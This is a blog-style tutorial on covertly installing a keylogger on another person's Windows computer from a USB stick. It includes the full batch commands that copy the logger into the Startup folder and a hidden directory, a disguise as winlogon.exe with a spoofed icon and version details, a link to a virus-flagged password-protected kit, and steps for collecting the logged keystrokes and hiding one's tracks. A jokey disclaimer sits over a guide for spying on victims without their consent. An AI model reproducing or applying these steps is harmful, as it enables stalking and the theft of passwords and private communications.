Let’s say your “friend” has some “secret nuclear launch codes” in his computer that he is going to sell for a lot of rapper money, and you want to “save the world” by intercepting those launch codes so you could alert the government. Now, based on this assumption, I’ll show you how to record the keystrokes your “friend”—well—strokes; silently, without raising any suspicion using just a USB stick.
• Records timestamps of keys pressed
• Records the current window in which the keys are being pressed like Google, YouTube, Facebook, etc.
• Records non-alphanumeric keys as well such as Esc, Space, Enter, Ctrl, etc.
• Automatically gets copied into the system (or you can choose a custom location of storage) to be hidden and executed even after the USB stick is plugged out
• Automatically gets copied into the Startup folder to be executed every time the system is turned on (so does not stop recording once the system reboots)
• Well hidden and disguised as a Windows system file. You can choose between two Task Manager icons in my kit, to your liking. Option 1 is easier to find in order to kill quickly, while option 2 is harder to find at the cost of being a little tougher to kill quickly
• File version information (Details tab in Properties) disguised as a legitimate Windows file as well; ergo, quite difficult to spot
• Written in Python, and wrapped up into a convenient and not-messy-or-all-over-the-place beautiful little all-in-one single executable file (.exe) for easy and independent execution
Oh, wait, it’s disclaimer dropping time.
Disclaimer: I will not be responsible for any sort of trouble that you might get yourself into—if you do; and this guide solely exists for ethical and educational purposes.
There, it’s in red and italics too. Let’s get to saving the world!
Step 1: Download the tool required
You’re going to need the little kit that I made for this, which you can download from here.
Password: 123456 (Had to set a password so that MediaFire doesn’t flag the file as a virus. I guarantee you it’s a false positive, 100% safe, I scanned it myself with the latest updated signature database of ESET NOD32 Antivirus)
After the download is complete, extract the .RAR file anywhere you like and you’ll now have the folder “logs” there, with the following files in it:
Step 2: Plug the USB stick in
Take the USB stick which you want to turn into the keylogging tool, and plug it into your computer.
Step 3: Install the tool onto the USB stick
Now, copy the “logs” folder as extracted, and paste it into the USB stick.
You’re pretty much done here!
Step 4: Test the stick on your own / ”friend’s” computer
Plug the USB stick into the computer and run the regular batch file (create_dmp.bat).
NOTE: If you’re having trust issues, you can right-click the .bat file and click on “Edit” to see the commands that will be executed when you click on the .bat file for real. The purpose of each line in that file is also explained below:
xcopy "%CD%\init.dll.lnk" "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\" [Copies a shortcut of the keylogger into the Startup folder] xcopy "%CD%\winlogon.exe" "%HOMEDRIVE%\tmp\winsvr\logon\" /O /X /H /K /I [Copies the keylogger into the system (default or custom location)] attrib +h %HOMEDRIVE%\tmp [Makes the keylogger folder in the system (default or custom location) hidden] start %CD%\init.dll.lnk [Executes the keylogger and exits the command prompt window as soon as all the commands are executed]
Now, once you’ve actually double-clicked on the .bat file like a big boy, you’ll see a command prompt window flash in front of you, run all the above commands, and then automatically exit; all in a quick flash. If you are fortunate enough to take a quick screenshot of this wild entity in its prime execution in its habitat, you might have a glimpse of something that looks like this:
NOTE: If you get the “Access denied” and/or “path specified does not exist” message(s), you may not have the required privilege to copy the files into the main OS drive partition’s root (typically C:\). So, run the custom location batch file (create_dmp_custom.bat) instead of the regular batch file (create_dmp.bat) to copy the files into a custom location of your choice instead of the main OS drive partition’s root; it will ask you which folder you would like to choose for the dumping, and it even has a neat and convenient GUI folder browser as well!
The command prompt window flashing itself just once and vanishing into volatility means the tool is successfully running in the background now. Unplug your USB stick from the system, and let the keylogger sit in the system, collecting intel.
Step 5: Extract the collected intel
Now, whenever you want to extract the logged data, navigate to the tool’s default “OS-DRIVE-PARTITION-LETTER:\tmp\winsvr\logon\” folder or the custom folder you had chosen when you ran the custom location batch file.
NOTE: This folder will always be hidden, so make sure you enable viewing hidden files and folders to see the dump.
Inside the folder you’ll see the file “access.log”, as shown below:
That’s the text file where all the keystrokes are recorded. Open it (with Notepad, if it asks), and you’ll see something like this:
Those are the keystrokes being logged into the text file, along with the window the keystrokes are logged from and also the timestamp of each keystroke.
There, you’ve done it! You now have perhaps the deadliest of keylogging devices that fits right in your pocket. Go, save the world!
How Good is it at Hiding?
TL;DR: Very good.
This keylogger disguises itself as “winlogon” in the Windows Task Manager, which is a system file that deals with Windows Logon. Hence, this decreases suspicion by a huge factor. It looks like this in the Task Manager:
Even the file version information is all the same as the genuine winlogon.exe file. Here’s the comparison between the real and keylogging winlogon.exe processes:
I choose to use the blue icon variant of the winlogon process because I can easily distinguish it, but using the green one adds more credibility at the cost of being a little tough to distinguish and kill. Also know that if you happen to kill the actual winlogon process, you will automatically be logged out of your Windows account immediately and be sent straight back to the Windows login screen.
NOTE: The default icon variant in this kit is blue in this kit. If you want the green variant instead, copy “winlogon.exe” from the “Green Icon” folder and paste (overwrite) it in the main “logs” folder before running the batch file.
Fixing / Reversing the Effects
To reverse everything you just did in case you are compromised and your cover is blown:
• Open the Task Manager, select the specific “winlogon” process which has about 4,000 K in the “Memory” column (that’s the decoy/keylogging one), and kill it by right-clicking on it and selecting “End task”
• Delete the “tmp” folder (not TEMP) from your main OS drive partition (typically C:) OR the custom folder you had chosen when you used the custom location batch file
• Delete the “init.dll” shortcut in the Startup folder, or the “init.dll_” shortcut if you used the custom location batch file — You might have to enable viewing hidden files and folders to see the AppData folder
The Startup folder is located in: